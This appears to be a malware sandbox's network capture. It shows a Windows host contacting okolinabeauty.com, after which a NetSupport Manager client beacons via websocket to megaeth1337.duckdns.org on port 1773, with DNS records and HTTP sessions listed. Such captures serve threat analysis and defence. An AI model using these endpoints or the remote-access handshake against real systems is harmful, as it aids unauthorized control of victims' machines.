                                                                                        Nov 23, 2024 02:53:46.288752079 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.288752079 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.288752079 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.288819075 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.288826942 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.289376974 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.289376974 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.289381981 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.289674997 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.289684057 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.289757967 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.289764881 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.290002108 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.290426016 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.290433884 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.291325092 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.291534901 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.291671038 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.291671038 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.291671038 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.291676998 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.292228937 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.292237043 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.292411089 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.292602062 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.292606115 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.292608976 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.292969942 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.293188095 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.293195963 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.293349028 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.335374117 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.335376978 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.335474968 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.335685968 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.335948944 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.335961103 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.336072922 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.336169958 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.336173058 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.336349010 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.336884975 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.336893082 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.337064028 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.337163925 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.337167978 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.338633060 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.338641882 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.338658094 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.338664055 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.339603901 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.339854956 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.339862108 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.340167999 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.340174913 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.340523958 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.343549967 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.343559980 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.343719959 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.343807936 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.343815088 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.344068050 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.344904900 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.344914913 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.345056057 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.345134020 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.345136881 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.345227957 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.345381021 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.346573114 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.346582890 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.346728086 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.346735954 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.346944094 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.348177910 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.348186016 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.348310947 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.348403931 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.348407030 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.349433899 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.349445105 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.349745989 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.349745989 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.349755049 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.350481987 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.350481987 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.351114988 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.351124048 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.351422071 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.351428986 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.351780891 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.351787090 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.351790905 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.351794958 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.352066040 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.352083921 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.352092981 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.352351904 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.352356911 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.352427006 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.352478981 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.352488995 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.352570057 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.352575064 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.352674007 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.352729082 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.352859020 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.352866888 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.352869034 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.352874041 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.353064060 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.353157997 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.353403091 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.353411913 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.353648901 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.353652954 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.353717089 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.353806019 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.353857040 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.353864908 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.353977919 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.354026079 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.354130030 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.354134083 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.354243040 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.354253054 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.354325056 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.354329109 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.354403019 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.354480982 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.354557037 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.354566097 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.354638100 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.354645014 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.354727983 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.354877949 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.354887962 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.355462074 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.355462074 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.355462074 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.355462074 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.355472088 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.355478048 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.355488062 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.355650902 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.355655909 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.355845928 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.355845928 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.356028080 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.356036901 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.357480049 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.357480049 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.357486963 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.358418941 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.385109901 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.385123014 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.385922909 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.385922909 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.385922909 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.385931015 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.386852980 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.394800901 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.394817114 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.394964933 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.395059109 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.395065069 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.395226955 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.395324945 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.403691053 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.403707027 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.403830051 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.403911114 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.403917074 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.404067039 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.406115055 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.406131983 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.406251907 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.406433105 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.406440020 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.406629086 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.417273998 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.417289972 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.417480946 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.417557955 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.417563915 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.417726994 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.418200970 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.418216944 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.418351889 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.418533087 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.418539047 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.418715000 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.419644117 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.419660091 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.419859886 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.419869900 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.419936895 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.420054913 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.421821117 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.421838045 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.422163963 CET49744443192.168.11.20176.126.113.166
                                                                                        Nov 23, 2024 02:53:46.422172070 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.422749043 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.422765017 CET44349744176.126.113.166192.168.11.20
                                                                                        Nov 23, 2024 02:53:46.423089027 CET49744443192.168.11.20176.126.113.166
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Nov 23, 2024 02:53:39.385740042 CET | 192.168.11.20 | 1.1.1.1 | 0xc78 | Standard query (0) | okolinabeauty.com | A (IP address) | IN (0x0001) | false |
| Nov 23, 2024 02:54:12.925506115 CET | 192.168.11.20 | 1.1.1.1 | 0x6cef | Standard query (0) | geo.netsupportsoftware.com | A (IP address) | IN (0x0001) | false |
| Nov 23, 2024 02:54:14.807156086 CET | 192.168.11.20 | 1.1.1.1 | 0x51fa | Standard query (0) | megaeth1337.duckdns.org | A (IP address) | IN (0x0001) | false |
| Nov 23, 2024 02:55:20.337306976 CET | 192.168.11.20 | 1.1.1.1 | 0xa258 | Standard query (0) | megaeth1337.duckdns.org | A (IP address) | IN (0x0001) | false |

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Nov 23, 2024 02:53:39.590523005 CET | 1.1.1.1 | 192.168.11.20 | 0xc78 | No error (0) | okolinabeauty.com | | 176.126.113.166 | A (IP address) | IN (0x0001) | false |
| Nov 23, 2024 02:54:13.025580883 CET | 1.1.1.1 | 192.168.11.20 | 0x6cef | No error (0) | geo.netsupportsoftware.com | | 104.26.1.231 | A (IP address) | IN (0x0001) | false |
| Nov 23, 2024 02:54:13.025580883 CET | 1.1.1.1 | 192.168.11.20 | 0x6cef | No error (0) | geo.netsupportsoftware.com | | 104.26.0.231 | A (IP address) | IN (0x0001) | false |
| Nov 23, 2024 02:54:13.025580883 CET | 1.1.1.1 | 192.168.11.20 | 0x6cef | No error (0) | geo.netsupportsoftware.com | | 172.67.68.212 | A (IP address) | IN (0x0001) | false |
| Nov 23, 2024 02:54:14.918279886 CET | 1.1.1.1 | 192.168.11.20 | 0x51fa | No error (0) | megaeth1337.duckdns.org | | 185.170.144.66 | A (IP address) | IN (0x0001) | false |
| Nov 23, 2024 02:55:20.459094048 CET | 1.1.1.1 | 192.168.11.20 | 0xa258 | No error (0) | megaeth1337.duckdns.org | | 185.170.144.66 | A (IP address) | IN (0x0001) | false |

| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.11.20 | 49745 | 104.26.1.231 | 80 | 3456 | C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe |

Timestamp: Nov 23, 2024 02:54:13.156776905 CET | Bytes transferred: 118 | Direction: OUT | Data:
GET /location/loca.asp HTTP/1.1
                                                                                        Host: geo.netsupportsoftware.com
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
Timestamp: Nov 23, 2024 02:54:13.489687920 CET | Bytes transferred: 1094 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                        Date: Sat, 23 Nov 2024 01:54:13 GMT
                                                                                        Content-Type: text/html; charset=us-ascii
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        CF-Ray: 8e6d87b08eea72b9-EWR
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        cf-apo-via: origin,host
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3mH28tc1SOOFomBZWoZLUKlnqr2uLJYLYnYiLsazuB95cS6p5gv8%2B54erWrIw15OSIpIC7953yea4PwoDT2Ly9ZsQ%2FaYsIjUEE8m06qiaeJ5f6O6BGu%2BIclbhZwsSbWZ6PHe7AMPt3CnCEBF"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=95240&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                        Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Timestamp: Nov 23, 2024 02:54:13.489698887 CET | Bytes transferred: 5 | Direction: IN | Data:
Data Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 1 | 192.168.11.20 | 49746 | 104.26.1.231 | 80 | 3456 | C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe |

Timestamp: Nov 23, 2024 02:54:13.593702078 CET | Bytes transferred: 118 | Direction: OUT | Data:
GET /location/loca.asp HTTP/1.1
                                                                                        Host: geo.netsupportsoftware.com
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
Timestamp: Nov 23, 2024 02:54:13.916568041 CET | Bytes transferred: 1096 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                        Date: Sat, 23 Nov 2024 01:54:13 GMT
                                                                                        Content-Type: text/html; charset=us-ascii
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        CF-Ray: 8e6d87b348338c9b-EWR
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        cf-apo-via: origin,host
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ToH%2F6ReBX3KuwJRZCp2hXYx22vJxmqboG4uzh2cjDZPB1tRZKDItf5NVAvt6cO%2F2avq8kYCmW9UVvY2TjqchP5VIrSk92cjIHMGwr%2BBUY5%2BoH2CcwY79YOiSs63odFhmuyHQTiO9BFXGXAl0"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=94796&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                        Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Timestamp: Nov 23, 2024 02:54:13.916584015 CET | Bytes transferred: 5 | Direction: IN | Data:
Data Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 2 | 192.168.11.20 | 49747 | 104.26.1.231 | 80 | 3456 | C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe |

Timestamp: Nov 23, 2024 02:54:14.012007952 CET | Bytes transferred: 118 | Direction: OUT | Data:
GET /location/loca.asp HTTP/1.1
                                                                                        Host: geo.netsupportsoftware.com
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
Timestamp: Nov 23, 2024 02:54:14.401854038 CET | Bytes transferred: 1092 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                        Date: Sat, 23 Nov 2024 01:54:14 GMT
                                                                                        Content-Type: text/html; charset=us-ascii
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        CF-Ray: 8e6d87b5d99a0f81-EWR
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        cf-apo-via: origin,host
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tOS5fJQ5PrEyHP%2BsaKXZpwDr5%2F13GoXC7jk8Co51P7CSFExPrBNpuBaWwKXjtu6rEkJMmLBfKBQse0xowQbgJU1gAnyzuHjLB8ekYoOhsaRWOlBuVWOvt2gTPm2FT1dRbQpPXTYE2kL0bvyD"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=94587&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                        Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Timestamp: Nov 23, 2024 02:54:14.401865959 CET | Bytes transferred: 5 | Direction: IN | Data:
Data Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 3 | 192.168.11.20 | 49748 | 185.170.144.66 | 1773 | 3456 | C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe |

Timestamp: Nov 23, 2024 02:54:15.166377068 CET | Bytes transferred: 203 | Direction: OUT | Data:
GET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: tRPuzWtXaHbQaT2zVo4LtA==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
Timestamp: Nov 23, 2024 02:54:15.375292063 CET | Bytes transferred: 129 | Direction: IN | Data:
HTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
                                                                                        Sec-WebSocket-Accept: 9+b3LgojI+VGKrx00NR+Pkp+iU8=


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 4 | 192.168.11.20 | 49750 | 185.170.144.66 | 1773 | 3456 | C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe |

Timestamp: Nov 23, 2024 02:55:20.675120115 CET | Bytes transferred: 203 | Direction: OUT | Data:
GET / HTTP/1.1
                                                                                        Connection: Upgrade
                                                                                        Upgrade: websocket
                                                                                        User-Agent: NetSupport Manager/1.3
                                                                                        Sec-WebSocket-Key: KMCB/AAEvXXZkktXZbBj1g==
                                                                                        Sec-WebSocket-Version: 13
                                                                                        Host: megaeth1337.duckdns.org:1773
Timestamp: Nov 23, 2024 02:55:20.885466099 CET | Bytes transferred: 129 | Direction: IN | Data:
HTTP/1.1 101 Switching Protocols
                                                                                        Upgrade: websocket
                                                                                        Connection: Upgrade
